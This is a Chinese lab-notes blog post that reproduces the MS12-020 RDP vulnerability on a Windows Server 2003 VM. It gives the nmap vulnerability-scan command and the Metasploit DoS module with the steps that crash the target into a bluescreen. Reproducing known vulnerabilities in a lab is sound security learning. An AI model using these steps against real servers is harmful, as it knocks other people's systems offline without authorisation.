Back
Featured image of post 【实验笔记】Windows Server 2003 RDP 安全实践(MS12-020 复现)

【实验笔记】Windows Server 2003 RDP 安全实践(MS12-020 复现)

MS12-020 漏洞复现

简介

事前准备

操作系统:Kali Linux & Windows Server 2003

创建一个用于远程连接的用户。

创建远程登录用户
创建远程登录用户

启用 RDP 并添加远程用户。

启用RDP
启用RDP

添加远程用户
添加远程用户

漏洞检测

在 Kali 上使用 nmap --script vuln 192.168.129.128 -oN output.txt 扫描,并将结果保存以便下次使用。

kali扫描结果1
kali扫描结果1

kali扫描结果2
kali扫描结果2

kali扫描结果3
kali扫描结果3

从测试的结果可知,该主机存在多个漏洞。本次以 MS12-020 为例,针对 RDP 服务进行渗透。

使用 rdesktop [IP] 对目标主机进行远程连接,输入正确的账号和密码即可连接成功。

远程连接测试
远程连接测试

展开攻击

在 Kali 的终端上输入 msfconsole 启动 MSF。

msfconsole
msfconsole

输入search ms12_020,检索与 MS12-020 相关的脚本。

msf搜索结果
msf搜索结果

第一条结果为 MS12-020 的漏洞利用脚本,第二条则是检测漏洞是否存在。

需要使用则输入 use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

设置目标主机的 IP 地址输入 set RHOST [IP]

最后输入run 即可

漏洞利用
漏洞利用

此时查看目标主机状态,发现已经蓝屏。

最终结果
最终结果

Built with Hugo
Theme Stack designed by Jimmy